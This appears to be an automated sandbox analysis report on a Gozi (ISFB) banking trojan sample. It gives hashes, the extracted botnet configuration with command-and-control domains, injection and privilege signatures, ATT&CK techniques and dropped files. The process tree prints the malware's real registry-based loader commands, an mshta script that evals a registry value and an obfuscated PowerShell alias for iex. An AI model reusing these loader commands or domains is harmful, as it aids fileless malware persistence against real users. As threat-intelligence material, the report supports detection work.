gozi | 26dc3b58f57bf1d28e20374fcc13c33f3bc75bd753cf19afb617101f403f7b81

Analysis

max time kernel
152s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
11-10-2023 09:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client.exe
Size

287KB
MD5

bbf59fbbb9de660e113d82597c289cff
SHA1

85e3f40d8e5e5b93ef0e45e3cb5eec9dd19685be
SHA256

26dc3b58f57bf1d28e20374fcc13c33f3bc75bd753cf19afb617101f403f7b81
SHA512

8310447870f5de4ae575306391295f205d8ec0e3295f30e8b79e6d65a4e85ad408b0d07859e1c30294c843e5d23ca324d24fb20fe9ddb299dc4ad47d6a24cbfa
SSDEEP

3072:j6ya4jStntwsx48m71HMmJn0iZw6vK1ZRQxAgaX6wwrz+UTaBgfUd0:Q4gtTm7+mJnNZfK1ZRHRoJ

Score

10^/10

gozi 5050 banker dave isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

netsecurez.com

whofoxy.com

mimemoa.com

ntcgo.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Dave packer 1 IoCs

Detects executable using a packer named 'Dave' by the community, based on a string at the end.

dave

Processes:

resource	yara_rule
behavioral2/memory/2012-0-0x0000000002A70000-0x0000000002A7C000-memory.dmp	dave

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

Client.execontrol.exeExplorer.EXE

description	pid	process	target process
PID 2012 set thread context of 3116	2012	Client.exe	control.exe
PID 3116 set thread context of 3136	3116	control.exe	Explorer.EXE
PID 3136 set thread context of 3716	3136	Explorer.EXE	RuntimeBroker.exe
PID 3116 set thread context of 4952	3116	control.exe	rundll32.exe
PID 3136 set thread context of 4056	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 set thread context of 4856	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 set thread context of 3408	3136	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Client.exepowershell.exeExplorer.EXE

pid	process
2012	Client.exe
2012	Client.exe
2320	powershell.exe
2320	powershell.exe
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE

Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

Client.execontrol.exeExplorer.EXE

pid process

2012 Client.exe
3116 control.exe
3136 Explorer.EXE
3116 control.exe
3136 Explorer.EXE
3136 Explorer.EXE
3136 Explorer.EXE

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeShutdownPrivilege	3136	Explorer.EXE
Token: SeCreatePagefilePrivilege	3136	Explorer.EXE
Token: SeShutdownPrivilege	3136	Explorer.EXE
Token: SeCreatePagefilePrivilege	3136	Explorer.EXE
Token: SeShutdownPrivilege	3136	Explorer.EXE
Token: SeCreatePagefilePrivilege	3136	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3136 Explorer.EXE

pid	process
3136	Explorer.EXE

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

mshta.exeClient.exepowershell.execsc.execontrol.exeExplorer.EXEcsc.exe

description	pid	process	target process
PID 3572 wrote to memory of 2320	3572	mshta.exe	powershell.exe
PID 3572 wrote to memory of 2320	3572	mshta.exe	powershell.exe
PID 2012 wrote to memory of 3116	2012	Client.exe	control.exe
PID 2012 wrote to memory of 3116	2012	Client.exe	control.exe
PID 2012 wrote to memory of 3116	2012	Client.exe	control.exe
PID 2012 wrote to memory of 3116	2012	Client.exe	control.exe
PID 2012 wrote to memory of 3116	2012	Client.exe	control.exe
PID 2320 wrote to memory of 1308	2320	powershell.exe	csc.exe
PID 2320 wrote to memory of 1308	2320	powershell.exe	csc.exe
PID 1308 wrote to memory of 3744	1308	csc.exe	cvtres.exe
PID 1308 wrote to memory of 3744	1308	csc.exe	cvtres.exe
PID 3116 wrote to memory of 3136	3116	control.exe	Explorer.EXE
PID 3116 wrote to memory of 3136	3116	control.exe	Explorer.EXE
PID 3116 wrote to memory of 3136	3116	control.exe	Explorer.EXE
PID 3116 wrote to memory of 3136	3116	control.exe	Explorer.EXE
PID 3136 wrote to memory of 3716	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 3716	3136	Explorer.EXE	RuntimeBroker.exe
PID 3116 wrote to memory of 4952	3116	control.exe	rundll32.exe
PID 3116 wrote to memory of 4952	3116	control.exe	rundll32.exe
PID 3116 wrote to memory of 4952	3116	control.exe	rundll32.exe
PID 3136 wrote to memory of 3716	3136	Explorer.EXE	RuntimeBroker.exe
PID 3116 wrote to memory of 4952	3116	control.exe	rundll32.exe
PID 3136 wrote to memory of 3716	3136	Explorer.EXE	RuntimeBroker.exe
PID 3116 wrote to memory of 4952	3116	control.exe	rundll32.exe
PID 3136 wrote to memory of 4056	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4056	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4056	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4056	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4856	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4856	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4856	3136	Explorer.EXE	RuntimeBroker.exe
PID 2320 wrote to memory of 1952	2320	powershell.exe	csc.exe
PID 2320 wrote to memory of 1952	2320	powershell.exe	csc.exe
PID 3136 wrote to memory of 4856	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 3408	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3408	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3408	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3408	3136	Explorer.EXE	cmd.exe
PID 1952 wrote to memory of 1248	1952	csc.exe	cvtres.exe
PID 1952 wrote to memory of 1248	1952	csc.exe	cvtres.exe
PID 3136 wrote to memory of 3408	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3408	3136	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3136

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2012

C:\Windows\system32\control.exe
C:\Windows\system32\control.exe -h
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
4⤵
PID:4952

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>V0yx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(V0yx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9\\\ActiveStart'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name kvukyieqph -value gp; new-alias -name lelqmoho -value iex; lelqmoho ([System.Text.Encoding]::ASCII.GetString((kvukyieqph "HKCU:Software\AppDataLow\Software\Microsoft\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9").ClassFile))
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2o0fivwx\2o0fivwx.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1308

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES264B.tmp" "c:\Users\Admin\AppData\Local\Temp\2o0fivwx\CSCD7AF930629DF454B971077D44F226A95.TMP"
5⤵
PID:3744

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j13nwpne\j13nwpne.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1952

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2F53.tmp" "c:\Users\Admin\AppData\Local\Temp\j13nwpne\CSCB5DF6138A10B4F70AFEAD6A1498584.TMP"
5⤵
PID:1248

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:3408

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3716

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4856

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4056

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2o0fivwx\2o0fivwx.dll
Filesize
3KB

MD5
22d06a821ebab9a2dea142a617c56443

SHA1
0ae65132604b0872a68a2aefb45fedaa33a7772b

SHA256
8f3443d3325741fb18f89e5f1c72492d1e2e0f44de13705503388b90dae640f8

SHA512
232ae39280da5e2834a1e9ce8d2da97047044a86d706a80d0ec836cc121758bc64f991bc56203688e1853fefffed1a667e6014116720f5973e066927ed33061b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES264B.tmp
Filesize
1KB

MD5
0d27aa7dcb320832aea7f0eac01dfe1f

SHA1
93f54a5bb3dbbc25075454040cb6153b88de6d31

SHA256
679d6eadb5cde7d3e6234df1c4f37645c7121ff5d6a643d0f5d4232a7de55dd8

SHA512
70fe8c010a98192a6641f99cf6b0ca19d7cd95539fda21bc9b8e9056aec065b80838ed89d57cd22b0ad24e1f2448ad74845788cf5c005cae22977176c7716b3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2F53.tmp
Filesize
1KB

MD5
a33b5286bac771a79a87637b457d0c37

SHA1
9fdf4ae7579dd468bd4e7e2fe416de6d8dd275db

SHA256
670b9abd905578f2482d5ee0f7bd84c346b29d1e4df7ade737a848ba29df0531

SHA512
f98fa052e38e6702eeac1598a0098a850d08734e1519e9662dc162afe87be22087f0ea24a37ad64e9cc1a84a7ad48be285b18586529730bd09095ec46565f7b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3uhzpgka.adm.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\j13nwpne\j13nwpne.dll
Filesize
3KB

MD5
6c070fb37e79c21d24d286cff4b2e2cd

SHA1
9735479bf635d8ecb8d95a30ac46c8b38e6e2ea3

SHA256
c8013d285e71ddc22ae07ee7521f30cde6a29fa7da28641731c06ab011a84f2d

SHA512
81324b06116a28d0a68cc6af6347b656f0679e0a2aae1ca8f0d10ba5daf9f0c3d571ae0d4eb6d1c6eb5ea5d9230d7cd7b4b640a7a9516db9e74457bcf0a300a2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2o0fivwx\2o0fivwx.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2o0fivwx\2o0fivwx.cmdline
Filesize
369B

MD5
ac9b5da2b5d3376abdee655862e82ce3

SHA1
00f95ef1272d1e0a2453332effa432ade20db03c

SHA256
70a74e5d026d57793a4230d284af1a13a5537559d69f04738e49e386d55b879a

SHA512
8dbca9e917d525c54edda91d0a0d291ffbd096de5f59344bee59e06390897aaafaf900c133d0597e915aa78a82d6e55e4bd56bb708471f8eb5ffb36680dd5b80

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2o0fivwx\CSCD7AF930629DF454B971077D44F226A95.TMP
Filesize
652B

MD5
18c5e86834bc883926aa59881882b84b

SHA1
82a9c37acd0f8dda376d97942c73d879c330a423

SHA256
0027a016821bd42797e22144d54fdc17e7ef7f073fca269c23a32cd89a9c87b2

SHA512
e1e81816c45034276ce073f7d79dde17c160e136670f2bfbc9b945153e812db37df0f50cc63fcf729441bdb2487a1f41d7dcb08db9876ed5ae7311c5b5342ffc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j13nwpne\CSCB5DF6138A10B4F70AFEAD6A1498584.TMP
Filesize
652B

MD5
c98b979859bd9859d93e00ea36ed35f7

SHA1
5df4655930033634d1634b1e6cd72ae3fcb4275e

SHA256
b6f8f325f4a6d7288613e323ed081c9a9e69b682974b68a92624fcd3f322cfed

SHA512
b31f7f1004ba5882469c11c04e73a4a541a97b5c7796c471a975f03a3aa989d7f2a6aed61a2d8ed61a5127c0865543def36d02b271dda87ad1be3213b219074d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j13nwpne\j13nwpne.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j13nwpne\j13nwpne.cmdline
Filesize
369B

MD5
b59c096b4ea6a24d5a90f69a23f84615

SHA1
0c0f415947a6f3b0557f9c16a9e128b3eb13e2db

SHA256
2fba7df92c174b476185b65a9354b030a830034d1a6f1f7b6ae5f08e6fdeab74

SHA512
1cb8d037c18b81d8d50e9b966c9014a3d493a52ad1213d9d47e09f268e8569c80f95b19aebb0a571ab577344c69a9eddd6c4544b06f0b8b5aff22042ea6c5c74

Download Submit
memory/2012-5-0x0000000002A90000-0x0000000002A9F000-memory.dmp

Filesize
60KB

Download
memory/2012-0-0x0000000002A70000-0x0000000002A7C000-memory.dmp

Filesize
48KB

Download
memory/2012-1-0x0000000002A80000-0x0000000002A8F000-memory.dmp

Filesize
60KB

Download
memory/2012-11-0x0000000002AC0000-0x0000000002ACD000-memory.dmp

Filesize
52KB

Download
memory/2320-73-0x000001A1A4DE0000-0x000001A1A4DE8000-memory.dmp

Filesize
32KB

Download
memory/2320-82-0x00007FFE41510000-0x00007FFE41FD1000-memory.dmp

Filesize
10.8MB

Download
memory/2320-30-0x00007FFE41510000-0x00007FFE41FD1000-memory.dmp

Filesize
10.8MB

Download
memory/2320-32-0x000001A1BD540000-0x000001A1BD550000-memory.dmp

Filesize
64KB

Download
memory/2320-20-0x000001A1A4F90000-0x000001A1A4FB2000-memory.dmp

Filesize
136KB

Download
memory/2320-110-0x00007FFE41510000-0x00007FFE41FD1000-memory.dmp

Filesize
10.8MB

Download
memory/2320-87-0x000001A1BD540000-0x000001A1BD550000-memory.dmp

Filesize
64KB

Download
memory/2320-101-0x000001A1A5030000-0x000001A1A5038000-memory.dmp

Filesize
32KB

Download
memory/2320-31-0x000001A1BD540000-0x000001A1BD550000-memory.dmp

Filesize
64KB

Download
memory/2320-108-0x000001A1BD4C0000-0x000001A1BD4FD000-memory.dmp

Filesize
244KB

Download
memory/2320-84-0x000001A1BD540000-0x000001A1BD550000-memory.dmp

Filesize
64KB

Download
memory/3116-34-0x0000000000970000-0x0000000000A14000-memory.dmp

Filesize
656KB

Download
memory/3116-26-0x0000000000970000-0x0000000000A14000-memory.dmp

Filesize
656KB

Download
memory/3116-85-0x0000000000970000-0x0000000000A14000-memory.dmp

Filesize
656KB

Download
memory/3116-33-0x0000000000A20000-0x0000000000A21000-memory.dmp

Filesize
4KB

Download
memory/3136-45-0x00000000005A0000-0x00000000005A1000-memory.dmp

Filesize
4KB

Download
memory/3136-44-0x0000000008310000-0x00000000083B4000-memory.dmp

Filesize
656KB

Download
memory/3136-111-0x0000000008310000-0x00000000083B4000-memory.dmp

Filesize
656KB

Download
memory/3408-104-0x0000000000750000-0x0000000000751000-memory.dmp

Filesize
4KB

Download
memory/3408-103-0x0000000000B10000-0x0000000000BA8000-memory.dmp

Filesize
608KB

Download
memory/3408-107-0x0000000000B10000-0x0000000000BA8000-memory.dmp

Filesize
608KB

Download
memory/3716-59-0x000001BFB1BE0000-0x000001BFB1BE1000-memory.dmp

Filesize
4KB

Download
memory/3716-56-0x000001BFB2010000-0x000001BFB20B4000-memory.dmp

Filesize
656KB

Download
memory/3716-112-0x000001BFB2010000-0x000001BFB20B4000-memory.dmp

Filesize
656KB

Download
memory/4056-70-0x000002A8055A0000-0x000002A8055A1000-memory.dmp

Filesize
4KB

Download
memory/4056-69-0x000002A8055E0000-0x000002A805684000-memory.dmp

Filesize
656KB

Download
memory/4056-113-0x000002A8055E0000-0x000002A805684000-memory.dmp

Filesize
656KB

Download
memory/4856-89-0x0000028DE1170000-0x0000028DE1171000-memory.dmp

Filesize
4KB

Download
memory/4856-81-0x0000028DE18D0000-0x0000028DE1974000-memory.dmp

Filesize
656KB

Download
memory/4856-114-0x0000028DE18D0000-0x0000028DE1974000-memory.dmp

Filesize
656KB

Download
memory/4952-83-0x0000020666C80000-0x0000020666D24000-memory.dmp

Filesize
656KB

Download
memory/4952-57-0x0000020666C80000-0x0000020666D24000-memory.dmp

Filesize
656KB

Download
memory/4952-63-0x0000020666D30000-0x0000020666D31000-memory.dmp

Filesize
4KB

Download